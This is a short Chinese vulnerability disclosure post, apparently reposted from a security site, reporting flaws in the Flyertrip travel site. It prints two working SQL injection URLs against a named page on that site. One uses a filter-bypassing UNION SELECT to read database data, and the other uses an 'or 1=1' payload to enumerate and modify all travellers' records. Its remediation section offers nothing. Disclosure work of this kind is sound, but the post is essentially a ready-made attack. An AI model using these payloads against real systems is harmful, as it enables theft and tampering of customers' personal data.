飞客旅行网主站参数过滤不严,可导致注入,遍历,越权修改等高危漏洞

2015-12-26 04:58 发布者: admin 阅读:7968

今年过节不收礼,收礼只收脑白金

首先还是要注册个账号!

1.注入

http://www.flyertrip.com/hotels/personalCenter/editTravel.php?flag=update&id=-254%23%0aUNION%23%0aSELECT%23%0a1,2,3,4,5,6,7,user(),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29-- -


2.旅客信息遍历越权修改

http://www.flyertrip.com/hotels/personalCenter/editTravel.php?flag=update&id=1%23%0aor%23%0a1=1 limit%23%0a100,1-- s
修改100即可遍历所有旅客信息,也可进行修改

解决方案:

你们更专业.


来源:红黑联盟


关注公众号:Mcbang_com 了解更多精彩!

关注网络尖刀微信公众号
随时掌握互联网精彩
赞助链接